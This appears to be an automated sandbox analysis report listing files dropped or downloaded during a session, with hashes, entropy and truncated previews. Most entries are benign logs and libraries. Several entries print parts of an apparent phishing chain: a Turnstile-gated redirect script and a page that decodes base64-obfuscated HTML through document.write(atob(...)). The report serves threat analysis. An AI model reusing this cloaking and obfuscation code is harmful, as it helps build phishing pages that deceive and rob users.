                                                                                  SHA1:16C9027328B2F795472423009FF490AD63D7B55B
                                                                                  SHA-256:A06BD20B0FFA3AB59FAAE6901F7656BBC86E27F10197E6987DDF48BB9A69CFFE
                                                                                  SHA-512:0C198FF2AEA2F2BFF6E86A8D9062CF462909968006379A0A0CDD5702A10BF030C7908EF5D79BC0CB140360904AF6421A4C7AF81EE5F6E1B23564EDF3C7F40036
                                                                                  Malicious:false
                                                                                  Preview:SessionID=55647803-1beb-42b5-b8ad-636eff0c3485.1736906283358 Timestamp=2025-01-14T20:58:03:358-0500 ThreadID=1780 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=55647803-1beb-42b5-b8ad-636eff0c3485.1736906283358 Timestamp=2025-01-14T20:58:03:366-0500 ThreadID=1780 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=55647803-1beb-42b5-b8ad-636eff0c3485.1736906283358 Timestamp=2025-01-14T20:58:03:366-0500 ThreadID=1780 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=55647803-1beb-42b5-b8ad-636eff0c3485.1736906283358 Timestamp=2025-01-14T20:58:03:366-0500 ThreadID=1780 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=55647803-1beb-42b5-b8ad-636eff0c3485.1736906283358 Timestamp=2025-01-14T20:58:03:367-0500 ThreadID=1780 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):29752
                                                                                  Entropy (8bit):5.3891760846255945
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rW:C
                                                                                  MD5:08A9EF95B4EB3B3DCDF43A8B86E71B27
                                                                                  SHA1:477952CAAD9C66CF28025F1C293E86EE721410AD
                                                                                  SHA-256:85BBDB62642EC32C03F9CF9ABFA5F9361770D4FDBF149F2CB4F0310C587C1ED6
                                                                                  SHA-512:EE4F37F070830EA6921B5D75A365E59AE2287F35BBF66C10FFC029716BC098BB53F56C8CA45211F643AC5DDD57C7E99ECDF8D32A29927156BBC55D4729281F40
                                                                                  Malicious:false
                                                                                  Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                  Category:dropped
                                                                                  Size (bytes):758601
                                                                                  Entropy (8bit):7.98639316555857
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                  MD5:3A49135134665364308390AC398006F1
                                                                                  SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                  SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                  SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                  Malicious:false
                                                                                  Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                  Category:dropped
                                                                                  Size (bytes):1419751
                                                                                  Entropy (8bit):7.976496077007677
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:/xTwYIGNPgeWL07oYGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JTwZG/WLxYGZN3mlind9i4ufFXpAXkru
                                                                                  MD5:DAB0D55487947A8C00DEFEB1863E5D52
                                                                                  SHA1:CA21AE7C3A6C3B75C5FEE6CC45E57F4F8E9AAD6A
                                                                                  SHA-256:915AF8947C717264BA12E43919E2AED3846C3C312EE46DFEE18A7F40BE119623
                                                                                  SHA-512:A6C1268A6C488495C2D07A90F498014192501A27D4A597C20644F5C95D3E4A7777D8E884F13DA9933B8D5C399499C98BDE94988467F79BF11B4391869ACFAF17
                                                                                  Malicious:false
                                                                                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                  Category:dropped
                                                                                  Size (bytes):1407294
                                                                                  Entropy (8bit):7.97605879016224
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                  MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                  SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                  SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                  SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                  Malicious:false
                                                                                  Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                  Category:dropped
                                                                                  Size (bytes):386528
                                                                                  Entropy (8bit):7.9736851559892425
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                  MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                  SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                  SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                  SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                  Malicious:false
                                                                                  Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):16
                                                                                  Entropy (8bit):3.5
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:H+rYn:D
                                                                                  MD5:F1C9C44E663E7E62582E3F5B236C1C72
                                                                                  SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                                                                                  SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                                                                                  SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                                                                                  Malicious:false
                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlkUIgJhaJ0ExIFDTcwqTA=?alt=proto
                                                                                  Preview:CgkKBw03MKkwGgA=
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:HTML document, ASCII text, with very long lines (358)
                                                                                  Category:downloaded
                                                                                  Size (bytes):11816
                                                                                  Entropy (8bit):5.037139572888145
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:bpvXn2H25Zx48DNYGu6C9tdDOxktft1zQOPtaUrzvHlPuPQXGuV27BHplXtAUU/s:FvX2H25v4CYn6etFTBvhtv4IcpRtlU/s
                                                                                  MD5:A8063BD37D3C8FB3176A6BF140558A4D
                                                                                  SHA1:E32CF4B407DB3D3773DED13FF64B70FDBAD7735F
                                                                                  SHA-256:BCCB23D41C2CC69CF0C7D22C4314CA8181A513C6999B73E45307792830F4E482
                                                                                  SHA-512:82D749F6B17B21587FB345CA196A2AA83ECA80AD66ED9C1AB88B36709BED14175D53AFEFE9ACC0DAFC4FAD78FFB8DF155193A6829BC857AD6D68B1C84AF7B854
                                                                                  Malicious:false
                                                                                  URL:https://aifunygg.planaltinashopping.com.br/favicon.ico
                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">.<head profile="http://gmpg.org/xfn/11">. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <title>404 - PAGE NOT FOUND</title>...... Add Slide Outs -->.....<script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> .....<script src="/cgi-sys/js/simple-expand.min.js"></script>. . <style type="text/css">. body{padding:0;margin:0;font-family:helvetica;}. #container{margin:20px auto;width:868px;}. #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;}. #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;}. #container #mid404 #gatorbottom{position:relative;left:39px;float:left;}. #
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (65447)
                                                                                  Category:dropped
                                                                                  Size (bytes):89501
                                                                                  Entropy (8bit):5.289893677458563
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                  Malicious:false
                                                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):61
                                                                                  Entropy (8bit):3.990210155325004
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                  MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                  SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                  SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                  SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                  Malicious:false
                                                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                  Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:HTML document, ASCII text, with very long lines (65448), with CRLF line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):446804
                                                                                  Entropy (8bit):3.1230297734533674
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:aktYmG/kw9IaqdIvAjdTeqV/ktYmG/kw9IaqdIvAjdTeqYclrrlrH:aIYR/kw9IG4ZTJ/IYR/kw9IG4ZT8c95
                                                                                  MD5:1343DA14CCC236D1B0BEB3DE892AA294
                                                                                  SHA1:50E25A2E24A10711225960EEB6CDE230EB5AC7B0
                                                                                  SHA-256:25ED2EFCF95BC07806794E6EA040A95BB123FEBC55E2997F4197160A58AAC1E7
                                                                                  SHA-512:90E2C5BAEC775352F317093CB5FD2285BCDEBF3DB5CB57622A955B7DDCCB3967D8433BB5A65781EC3613B93ADB6076BA10BBA68F5C20EF5504CC0FD82CEEF98B
                                                                                  Malicious:false
                                                                                  URL:https://qelira.qelirathor.ru/1e66qhX9/
                                                                                  Preview:<script>....if(atob("aHR0cHM6Ly9jSS5xZWxpcmF0aG9yLnJ1LzFlNjZxaFg5Lw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KPHN0eWxlPg0KYm9keSwgaHRtbCB7DQptYXJnaW46IDA7DQpwYWRkaW5nOiAwOw0KaGVpZ2h0OiAxMDAlOw0Kb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCg0KLmJhY2tncm91bmQtY29udGFpbmVyIHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KLmJhY2tncm91bmQtY29udGFpbmVyIC5iYWNrZ3JvdW5kIHsNCiAgICBjb250ZW50OiAiIjsNCiAgICBwb3NpdGlvbjogYWJzb2x1dGU7DQogICAgdG9wOiAwOw0KICAgIGxlZnQ6IDA7DQogICAgcmlnaHQ6IDA7DQogICAgYm90d
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 53 x 40, 8-bit/color RGB, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):61
                                                                                  Entropy (8bit):4.068159130770306
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:yionv//thPlwFQAf7syxl/k4E08up:6v/lhPuGAzsy7Tp
                                                                                  MD5:14E2BF286C16AE0B984270FEA5AF7B5E
                                                                                  SHA1:48BE2BEEE8D6F170035E30A2A43BB4B0715A0ED4
                                                                                  SHA-256:F0040575B7BDD25985738665B4673D5E5E1FE7782427C547F395AC25FF48D922
                                                                                  SHA-512:6B8FE3F73EB0715ABB9C2B184F8DC85832F31B90F09D3E1EB45D315874EF96710C169748565C16EE1A3FE8B85B8126D55D0ADAAF0B1A5BE4EB7A3E3E70417C97
                                                                                  Malicious:false
                                                                                  Preview:.PNG........IHDR...5...(.......%b....IDAT.....$.....IEND.B`.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 53 x 40, 8-bit/color RGB, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):61
                                                                                  Entropy (8bit):4.068159130770306
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:yionv//thPlwFQAf7syxl/k4E08up:6v/lhPuGAzsy7Tp
                                                                                  MD5:14E2BF286C16AE0B984270FEA5AF7B5E
                                                                                  SHA1:48BE2BEEE8D6F170035E30A2A43BB4B0715A0ED4
                                                                                  SHA-256:F0040575B7BDD25985738665B4673D5E5E1FE7782427C547F395AC25FF48D922
                                                                                  SHA-512:6B8FE3F73EB0715ABB9C2B184F8DC85832F31B90F09D3E1EB45D315874EF96710C169748565C16EE1A3FE8B85B8126D55D0ADAAF0B1A5BE4EB7A3E3E70417C97
                                                                                  Malicious:false
                                                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/902242d8f9180f6d/1736906312223/ImUa0poB2nYJac9
                                                                                  Preview:.PNG........IHDR...5...(.......%b....IDAT.....$.....IEND.B`.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (47520)
                                                                                  Category:dropped
                                                                                  Size (bytes):47521
                                                                                  Entropy (8bit):5.3981340461317835
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                                                  MD5:7C92EC9D1395055CE0405A32607C7291
                                                                                  SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                                                  SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                                                  SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                                                  Malicious:false
                                                                                  Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 27 x 94, 8-bit/color RGB, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):61
                                                                                  Entropy (8bit):4.068159130770307
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:yionv//thPleipBxl/k4E08up:6v/lhPT7Tp
                                                                                  MD5:4D47B8C30BB75EEAE3948D34FF80098D
                                                                                  SHA1:3A91C73F70FB67B37082B4038242672688CBC5C2
                                                                                  SHA-256:7F82F020C7548DA540D498A049B568C0B5996B1854F5B2CF9652E8E5D0BD291A
                                                                                  SHA-512:ACFE1CC0964B7887972D521F41050925964F7B30006CE49D0ABB8AB8DC5E3CA2091BFAA990A86B9A545330530241098EC0DDEA5BE5AA287619049CB695AA4FE7
                                                                                  Malicious:false
                                                                                  URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/902245eceb0e5e66/1736906438391/wFJt-uWa1ESZ5iy
                                                                                  Preview:.PNG........IHDR.......^.....]#......IDAT.....$.....IEND.B`.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):327
                                                                                  Entropy (8bit):4.920186353443029
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:HtW9lD+/98MPpC7T1KVpHodNXpKpWgLZmUemmHt3VBMF9n:NWqeM5/q87ZmHxH+9n
                                                                                  MD5:470FBE03EDD3BBE33327AB80A8B27958
                                                                                  SHA1:851F296FF6169699D8392576AF211C43777456DE
                                                                                  SHA-256:A36045D2D009B347C7CFAADD47F457351432AC546DC0E6FCB9D444F0C922CD99
                                                                                  SHA-512:6BC0A0E1947A801EA96FB72D2EE4B9B41461694964E151C04C6E1D85C205142F7414D27BF87FE7024F2A86816C76C329FEC0EC5F0736AF51481BCC40067A49E4
                                                                                  Malicious:false
                                                                                  URL:https://aifunygg.planaltinashopping.com.br/main.js
                                                                                  Preview:window.onloadTurnstileCallback = function () {.. turnstile.render('#myWidget', {.. sitekey: '0x4AAAAAAA5OKIzF1t1zkHd6',.. callback: function(token) {.. console.log('Challenge Success ${token}');.. window.location.href = "https://qelira.qelirathor.ru/1e66qhX9/";.. },.. });.. };
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):612
                                                                                  Entropy (8bit):4.988321743922674
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:hPG4yvjS5SSavmmMcw2osZdr8+HskwGWuMCcf0+uNV4Gb:hPxR5SPvGYdrRWuMC2uNV4M
                                                                                  MD5:90FCE18E5EF426EA4D79AA9F3553FB96
                                                                                  SHA1:2FC864EA0F46AB0D95AC9FE00A01E4280D780FFF
                                                                                  SHA-256:59EACA076136932EC883A42164BEB703DB25C1616F2D6759A0AF2A620C170157
                                                                                  SHA-512:7AF35051E65E9D2CB330102AD3CD671E2285858DA2E0AD3BFABBEBBD5987E6BFBF449F2E42FE7C5FD0F0A50998497F1CA428EA7A8E39E6C5453D4DAA6E10D1CA
                                                                                  Malicious:false
                                                                                  URL:https://aifunygg.planaltinashopping.com.br/
                                                                                  Preview:<!DOCTYPE html>..<html lang="en">....<head>.. <meta charset="UTF-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Document</title>..<style>.. div {.. display: flex;.. align-items: center;.. justify-content: center;.. width: 90vw;.. height: 85vh;.. background-color: white;.. flex-direction: row;.. }..</style>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback" defer></script>..</head>....<body>....<div id="myWidget"></div>...... <script src="main.js"></script> ..</body>....</html>
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (65447)
                                                                                  Category:downloaded
                                                                                  Size (bytes):89501
                                                                                  Entropy (8bit):5.289893677458563
                                                                                  Encrypted:false
